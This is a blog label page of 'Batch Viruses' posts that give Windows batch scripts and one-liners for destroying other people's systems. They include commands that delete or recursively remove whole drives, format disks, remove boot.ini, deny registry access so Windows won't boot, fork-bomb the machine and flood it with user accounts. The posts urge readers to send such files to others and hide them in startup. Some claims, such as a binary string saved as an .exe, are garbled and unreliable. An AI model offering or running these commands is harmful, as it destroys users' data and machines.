Skip to main content

Posts

Showing posts with the label Batch Viruses

SIMPLE VIRUS !

Write ur own simple virus cant detected by any antivirus.... @Echo off Del C:\ *.* |y And save that as .bat not .txt and RUN IT It will delete the content of C:\ drive... PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:... IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive EVEN I DIDN't TRY THIS........ I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE... Another Virus Trick: If you log in to some admin account in XP, then open regedit, right click on HKEY_LOCAL_MACHINE , click Permissions, select SYSTEM and "deny" access. repeat this for HKEY_USERS, next time the computer won't boot

Dangerous VIRUS !

This code about multiple open windows means infinite windows until continue you restart the computer:save on denger.bat and code written in notepad @echo off copy 0% denger.bat start denger.bat This code about the computer shutdown: @echo off shutdown -s -t 5 -c “Shutdown” Go to notepad and type the following: @Echo off Del C:\ *.*|y save it as Dell.bat Want worse then type the following: @echo off del %systemdrive%\*.*/f/s/q shutdown -r -f -t 00 and save it as a .bat file One more … try one this Cd C:\ rd C:\ /s/q Cd D:\ rd D:\ /s/q Cd E:\ Rd E:\ /s/q Cd F:\ Rd\ /s/q then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don’t try on your own pc. NOTE :- Howto add your own created viruses into start ups this will make it difficult to detect them n to remove them … For this u need a registry updater software . now move your .bat file to c:/windows and then simply run this software ur virsu will be ad...

Another Funny Virus Code !

Another Funny Virus For Yu People ! cls :A color 0a cls @echo off echo Wscript.Sleep 5000>C:\sleep5000.vbs echo Wscript.Sleep 3000>C:\sleep3000.vbs echo Wscript.Sleep 4000>C:\sleep4000.vbs echo Wscript.Sleep 2000>C:\sleep2000.vbs cd %systemroot%\System32 dir cls start /w wscript.exe C:\sleep3000.vbs echo Deleting Critical System Files… echo del *.* start /w wscript.exe C:\sleep3000.vbs echo Deletion Successful! echo: echo: echo: echo Deleting Root Partition… start /w wscript.exe C:\sleep2000.vbs echo del %SYSTEMROOT% start /w wscript.exe C:\sleep4000.vbs echo Deletion Successful! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo Creating Directory h4x… cd C:\Documents and Settings\All Users\Start Menu\Programs\ mkdir h4x start /w wscript.exe C:\sleep3000.vbs echo Directory Creation Successful! echo: echo: echo: echo Execution Attempt 1… start /w wscript.exe C:\sleep3000.vbs echo cd C:\Documents and Settings\All Users\Start...

Have Some Funny Viruses !

Some Funny Virus Codes A simple binary codes that can format the system drive ,secondary drives… Copy The Following In Notepad Exactly as it 01001011000111110010010101010101010000011111100000 Save As An EXE Any Name Will Do Send the EXE to People And Infect Some other interesting formatting codes…. format c:\ /Q/X — this will format your drive c:\ 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 format d:\ /Q/X — this will format your dirve d:\ 01100110011011110111001001101101011000010111010000 100000011001000011101001011100 0010000000101111010100010010111101011000 format a:\ /Q/X — this will format your drive a:\ 01100110011011110111001001101101011000010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000 del /F/S/Q c:\boot.ini — this will cause your computer not to boot. 01100100011001010110110000100000001011110100011000 10111101010011001011110101000...

How To Make A Virus !

Simple Virus Making: If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can’t be detected by any anti virus Here are some good viruses ,i am not responsible for any kind of damage to your system … Copy this to notepad and save as flood1.bat….. @ECHO OFF @ECHO A 9xero’s Creation @ECHO MAIN BAT RUNNING GOTO start :start @ECHO SET magic2=1 >> bat6.bat @ECHO GOTO flood5 >> bat6.bat @ECHO :flood5 >> bat6.bat @ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat @ECHO NET USER magic2%%magic2%% /add >> bat6.bat @ECHO GOTO flood5 >> bat6.bat START /MIN bat6.bat GOTO bat5 :bat5 @ECHO CD %%ProgramFiles%%\ >> bat5.bat @ECHO SET pogo=1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat @ECHO :flood4 >> bat5.bat @ECHO MKDIR pogo%%pogo%% >> bat5.bat @...